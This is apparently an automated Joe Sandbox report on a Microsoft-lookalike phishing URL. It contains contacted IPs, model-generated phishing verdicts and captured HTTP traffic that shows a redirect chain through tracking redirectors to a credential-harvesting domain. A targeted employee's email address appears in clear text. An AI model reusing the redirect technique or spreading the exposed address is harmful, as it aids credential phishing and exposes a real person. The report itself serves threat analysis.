https://webnnicuttnortheastusa.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3dlYm5uaWN1dHRub3J0aGVhc3R1c2EuY29tLyIsImRvbWFpbiI6IndlYm5uaWN1dHRub3J0aGVhc3R1c2EuY29tIiwia2V5IjoiTm1YcDJ4Tm9uY3JBIiwicXJjIjoibGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbSIsImlhdCI6MTcxODk4NTU3NywiZXhwIjoxNzE4OTg1Njk3fQ.HykXssHfF_M4UV6XA1brZjWnq3CfmkAs4Wo7LDtvRyM	true	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/turnstile/v0/b/c7e29c8c8b6e/api.js	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://github.com/jquery/globalize	chromecache_96.2.dr	false	Avira URL Cloud: safe	unknown
http://knockoutjs.com/	chromecache_123.2.dr	false	URL Reputation: safe	unknown
https://login.windows-ppe.net	chromecache_100.2.dr	false	URL Reputation: safe	unknown
https://js.monitor.azure.com/scripts/c/ms.analytics-web-2.min.js	chromecache_123.2.dr	false	Avira URL Cloud: safe	unknown
http://www.json.org/json2.js	chromecache_123.2.dr	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com	chromecache_100.2.dr	false	URL Reputation: safe	unknown
http://www.opensource.org/licenses/mit-license.php)	chromecache_123.2.dr	false	URL Reputation: safe	unknown
https://account.live.com/resetpassword.aspx	chromecache_106.2.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.246.42	s-part-0014.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.126.32.140	autologon.microsoftazuread-sso.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.217.18.4	www.google.com	United States	15169	GOOGLEUS	false
69.49.245.172	kenfong.com	United States	46606	UNIFIEDLAYER-AS-1US	false
54.72.98.24	baconredirects-elb-1vu8uzbbqecyf-1056340931.eu-west-1.elb.amazonaws.com	United States	16509	AMAZON-02US	false
85.14.248.71	tp-emea.exactag.com	Germany	24961	MYLOC-ASIPBackboneofmyLocmanagedITAGDE	false
104.17.3.184	unknown	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
89.23.108.32	webnnicuttnortheastusa.com	Russian Federation	48687	MAXITEL-ASRU	true
52.98.241.178	HHN-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.17.2.184	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1460827
Start date and time:	2024-06-21 17:57:55 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.phis.win@23/109@34/12
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Browse: https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2fwebnnicuttnortheastusa.com%2fcommon%2freprocess%3fctx%3drQQIARAAjZE7bNNgFIX9x6lpS6FRWdiACCRUcPxOnKBKJE7T5tW8VIiLquD4kTiJ_bu286yyMLEgCiOIgYcYOkEnxATq1qkjlAWJpepQQaeOJGJhgzOce6Sre4fzzaNUgIpcJf-IxseOk5pG4bI6Tn_Jnpv2_Th5_VW5sv7lVuD6cFcQj7fBpbrrWk6EIGDbbUHYDEBN02U1IEODgF2J-ADAPgCHADz1XGtJXVs1R0vNlkbjtixVdVN1u9BuOjUbtq3x1bYnFGR4juV4mgmRLMmFSZYKyHyIZaigijMUreIsR2k4z_IhXGI1UqG0YJWmmQPPbC7aduv02KCtD9QTz5QGbaNiQcd9hj4HcdGNxZ1kbTEaizF4uqjAxQQF8720KOp3lpKZmNFhO_WewTVKcrYsqmZUlOuWPjBqXWnVhbGa3RT6ulEo9Ck3kdjYSK_Ek6loIyWIfMpsZNaKJXOlR7qDUDmIV5nyCqctp7lq3e3YiliweiW-ny3Xc0K5nMsUJcatUNRaxeybq5UCv43-F4QdFBt1ZEBzD8WgpZq6su8F373gyDtDopHJyWkfchG5jJx6wauJEa_O8ur9b48fCI_eX9jN_1pC9iYISg2V6govJmyim8kWc-12XlcZVgyHlgotsZ8ULYMoCfJgkc4ucBFqCwNbGPYRm5pEfYgfFfLUIQZ-YuDhGeTj1L_g758FBzPsNCa3JN1w5uY3_bpScWFTNf2RTX_PcCqyPE4dqdVWHX_knn_0378-HA4_nUNOzz95-eLtzuc3x8tHszd1vZgh6VhayHSYGm8yhGLdWGPvOp0wy8tM2qg25GB3I06kwvLCOx_yGw2&mkt=en-US&hosted=0&device_platform=Windows+10

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.195, 142.250.185.110, 74.125.71.84, 34.104.35.123, 40.127.169.103, 2.19.126.206, 2.19.126.222, 192.229.221.95, 20.3.187.198, 40.126.32.68, 40.126.32.133, 40.126.32.136, 40.126.32.72, 40.126.32.134, 20.190.160.14, 20.190.160.20, 40.126.32.76, 23.15.178.82, 23.15.178.113, 142.250.186.42, 142.250.186.170, 216.58.212.138, 142.250.186.138, 142.250.185.234, 142.250.184.234, 216.58.206.74, 172.217.18.106, 142.250.185.74, 142.250.186.106, 142.250.185.202, 142.250.184.202, 172.217.18.10, 142.250.181.234, 172.217.16.202, 172.217.16.138, 40.126.32.6, 40.126.32.66, 40.126.32.131, 40.126.32.129, 142.250.186.131, 152.199.19.160, 20.190.177.0, 142.250.185.170, 216.58.206.42, 142.250.74.202, 142.250.185.106, 142.250.185.138, 142.250.186.74
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, na.privatelink.msidentity.com, clientservices.googleapis.com, a767.dspw65.akamai.net, clients2.google.com, mscomajax.vo.msecnd.net, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, wu-b-net.trafficmanager.net, client.ppe.repmap.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, e40491.dscg.akamaiedge.net, prdv4a.aadg.msidentity.com, www.ppev6tm.aadg.akadns.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, prdf.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, aadcdnoriginwus2.azureedge.net, cs22.wpc.v0cdn.net, www.tm.v4.a.prd.aadg.akadns.net, www.tm.f.prd.aadg.akadns.net, ctldl.windowsupdate.com, aadcdn.msauth.net, passwordreset.mso.msidentity.com, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379

Input	Output
URL: https://webnnicuttnortheastusa.com Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Microsoft", "phishing": true, "suspicious_domain": true, "has_loginform": true, "has_captcha": false, "setechniques": true, "has_suspicious_link": true, "legitmate_domain": "microsoft.com", "reasons": "The URL 'https://webnnicuttnortheastusa.com' does not match the legitimate domain for Microsoft, which is 'microsoft.com'. The image resembles a Microsoft login page, which is a common target for phishing attacks. The domain name appears suspicious and unrelated to Microsoft. The presence of a login form and the use of social engineering techniques to mislead users into thinking they are logging into a legitimate Microsoft account further indicate that this is likely a phishing site."}

URL: https://webnnicuttnortheastusa.com Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Microsoft Outlook", "phishing": true, "suspicious_domain": true, "has_loginform": true, "has_captcha": false, "setechniques": true, "has_suspicious_link": false, "legitmate_domain": "outlook.com", "reasons": "The URL 'https://webnnicuttnortheastusa.com' does not match the legitimate domain name 'outlook.com' associated with Microsoft Outlook. The webpage mimics the Outlook login page, which is a common social engineering technique used in phishing attacks. The presence of a login form asking for a password is another indicator of a phishing attempt. There is no CAPTCHA present, which is often used in legitimate login pages to prevent automated attacks. The overall design closely resembles a legitimate Outlook login page, which is intended to mislead users into entering their credentials."}

URL: https://passwordreset.microsoftonline.com Model: gpt-4o	```json{ "phishing_score": 0, "brands": "Microsoft", "phishing": false, "suspicious_domain": false, "has_loginform": true, "has_captcha": true, "setechniques": false, "has_suspicious_link": false, "legitmate_domain": "microsoftonline.com", "reasons": "The URL 'https://passwordreset.microsoftonline.com' appears to be legitimate as it uses the official 'microsoftonline.com' domain, which is associated with Microsoft. The webpage design and branding match Microsoft's style, and there are no obvious signs of social engineering techniques or suspicious links. The presence of a CAPTCHA adds to the legitimacy. Therefore, this site is likely legitimate."}

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (2345), with CRLF line terminators
Category:	downloaded
Size (bytes):	2347
Entropy (8bit):	5.290031538794594
Encrypted:	false
SSDEEP:	48:gCgF0+kNL5iQ6+GhB+SYWzGuesAFcsGJOzgO6FIEv+sj+M++sx+suse+swsosmC0:gC3Na5+GX+Ti2XsYE2sqAsosushswsoB
MD5:	E86EF8B6111E5FB1D1665BCDC90888C9
SHA1:	994BF7651CB967CD9053056AF2D69ACB74DB7F29
SHA-256:	3410242720DE50B090D07A23AEE2DAD879B31D36F2615732962EC4CFA8A9D458
SHA-512:	2486B491681EE91A9CD1ECC9AA011A3FB34B48358C5D7A4D503A5357BC5CE4CA22999F918D40AC60A3063940D5F326FC7E4E5713D89D5C102DE68824E371B3AB
Malicious:	false
Reputation:	low
URL:	https://login.live.com/Me.htm?v=3
Preview:	<script type="text/javascript">!function(n,t){for(var e in t)n[e]=t[e]}(this,function(n){function t(i){if(e[i])return e[i].exports;var s=e[i]={exports:{},id:i,loaded:!1};return n[i].call(s.exports,s,s.exports,t),s.loaded=!0,s.exports}var e={};return t.m=n,t.c=e,t.p="",t(0)}([function(n,t){function e(n){for(var t=g[c],e=0,i=t.length;e<i;++e)if(t[e]===n)return!0;return!1}function i(n){if(!n)return null;for(var t=n+"=",e=document.cookie.split(";"),i=0,s=e.length;i<s;i++){var o=e[i].replace(/^\s(\w+)\s=\s*/,"$1=").replace(/(\s+$)/,"");if(0===o.indexOf(t))return o.substring(t.length)}return null}function s(n,t,e){if(n)for(var i=n.split(":"),s=null,o=0,a=i.length;o<a;++o){var l=null,c=i[o].split("$");if(0===o&&(s=parseInt(c.shift()),!s))return;var p=c.length;if(p>=1){var f=r(s,c[0]);if(!f\|\|e[f])continue;l={signInName:f,idp:"msa",isSignedIn:!0}}if(p>=3&&(l.firstName=r(s,c[1]),l.lastName=r(s,c[2])),p>=4){var g=c[3],m=g.split("\|");l.otherHashedAliases=m}if(p>=5){var h=parseInt(c[4],16);h&&(l.

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 21, 2024 17:58:50.220434904 CEST	53	52069	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:50.228761911 CEST	53	61383	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:51.245711088 CEST	53	63325	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:52.158266068 CEST	56230	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:52.158446074 CEST	51739	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:52.197118044 CEST	53	51739	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:52.197534084 CEST	53	56230	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:53.620892048 CEST	53133	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:53.621603012 CEST	57457	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:53.630275965 CEST	53	53133	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:53.631834030 CEST	53	57457	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:54.331968069 CEST	50053	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:54.332509995 CEST	59373	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:54.338707924 CEST	53	50053	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:54.340415001 CEST	53	59373	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:55.169332981 CEST	62958	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:55.170002937 CEST	63379	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:55.183985949 CEST	53	63379	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:55.205127954 CEST	53	62958	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:55.953967094 CEST	64896	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:55.954216003 CEST	57404	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:55.964665890 CEST	53	64896	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:55.965215921 CEST	53	57404	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:57.464473009 CEST	54942	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:57.464859009 CEST	64454	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:57.471577883 CEST	53	54942	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:57.477701902 CEST	53	64454	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:59.498509884 CEST	58452	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:59.498903990 CEST	63166	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:58:59.509114027 CEST	53	58452	1.1.1.1	192.168.2.4
Jun 21, 2024 17:58:59.509131908 CEST	53	63166	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:01.261321068 CEST	60027	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:01.261497021 CEST	55094	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:01.268604040 CEST	53	55094	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:01.268836021 CEST	53	60027	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:08.227113962 CEST	138	138	192.168.2.4	192.168.2.255
Jun 21, 2024 17:59:08.746923923 CEST	53	63767	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:27.550107002 CEST	60250	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:27.550503016 CEST	65402	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:27.572666883 CEST	53	57149	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:27.584404945 CEST	53	60250	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:27.591331005 CEST	53	65402	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:34.459743023 CEST	53113	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:34.460159063 CEST	60489	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:34.467691898 CEST	53	53113	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:34.467936039 CEST	53	60489	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:36.270498037 CEST	59329	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:36.277754068 CEST	53	59329	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:36.287658930 CEST	60114	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:36.294595957 CEST	53	60114	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:37.599100113 CEST	57241	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:37.599723101 CEST	58183	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:39.427890062 CEST	51861	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:39.428199053 CEST	63059	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:39.463860035 CEST	53	63059	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:39.465476990 CEST	53	51861	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:40.061709881 CEST	57176	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:40.062195063 CEST	54532	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:40.070190907 CEST	53	57176	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:40.070702076 CEST	53	54532	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:44.392870903 CEST	53	51772	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:48.815604925 CEST	62084	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:48.816063881 CEST	59851	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:50.026130915 CEST	53	58459	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:50.087140083 CEST	54944	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:50.087727070 CEST	57841	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:50.445163965 CEST	53	62845	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:52.576164961 CEST	53	58823	1.1.1.1	192.168.2.4
Jun 21, 2024 17:59:53.354698896 CEST	61084	53	192.168.2.4	1.1.1.1
Jun 21, 2024 17:59:53.354865074 CEST	56049	53	192.168.2.4	1.1.1.1

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jun 21, 2024 17:59:48.861974955 CEST	192.168.2.4	1.1.1.1	c2c0	(Port unreachable)	Destination Unreachable
Jun 21, 2024 17:59:52.390929937 CEST	192.168.2.4	1.1.1.1	c28e	(Port unreachable)	Destination Unreachable
Jun 21, 2024 17:59:53.639425993 CEST	192.168.2.4	1.1.1.1	c28e	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
Jun 21, 2024 17:58:55.219857931 CEST	492	OUT	GET /winner/54799//bGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ== HTTP/1.1 Host: kenfong.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jun 21, 2024 17:58:55.793293953 CEST	288	IN	HTTP/1.1 200 OK Date: Fri, 21 Jun 2024 15:58:54 GMT Server: Apache refresh: 0;url=https://venicuttnortheastusa.com/?lbkwmykb&qrc=lawrence.france@cabinetworksgroup.com Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jun 21, 2024 17:58:55.989198923 CEST	432	OUT	GET /favicon.ico HTTP/1.1 Host: kenfong.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://kenfong.com/winner/54799//bGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ== Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jun 21, 2024 17:58:56.117779016 CEST	515	IN	HTTP/1.1 404 Not Found Date: Fri, 21 Jun 2024 15:58:54 GMT Server: Apache Content-Length: 315 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:58:39 UTC	59	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-06-21 15:58:40 UTC	513	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Fri, 21 Jun 2024 15:58:39 GMT content-type: application/json; charset=utf-8 Content-Length: 319 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-06-21 15:58:40 UTC	319	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:58:53 UTC	988	OUT	GET /L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379 HTTP/1.1 Host: 5rve2bms.r.eu-west-1.awstrack.me Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:58:53 UTC	292	IN	HTTP/1.1 302 Found Date: Fri, 21 Jun 2024 15:58:52 GMT Location: https://m.exactag.com/ai.aspx?tc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41kenfong.com%2Fwinner%2F54799%2F%2FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ== Content-Length: 0 Connection: Close

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:58:54 UTC	817	OUT	GET /ai.aspx?tc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41kenfong.com%2Fwinner%2F54799%2F%2FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ== HTTP/1.1 Host: m.exactag.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:58:55 UTC	708	IN	HTTP/1.1 302 Found Connection: close Date: Fri, 21 Jun 2024 15:58:54 GMT Content-Type: text/html; charset=utf-8 Cache-Control: max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Transfer-Encoding: chunked Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fr, 21 Jun 2024 03:58:55 GMT Location: http:kenfong.com/winner/54799//bGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ== P3P: policyref="https://m.exactag.com/w3c/p3p.xml", CP="NOI NID STP STA CUR OUR" X-ET-Code: 20 X-ET-Camp: 0 X-ET-Monitoring: 1 Strict-Transport-Security: max-age=31536000 cross-origin-resource-policy: cross-origin X-Xss-Protection: 0 X-Content-Type-Options: nosniff
2024-06-21 15:58:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:58:56 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
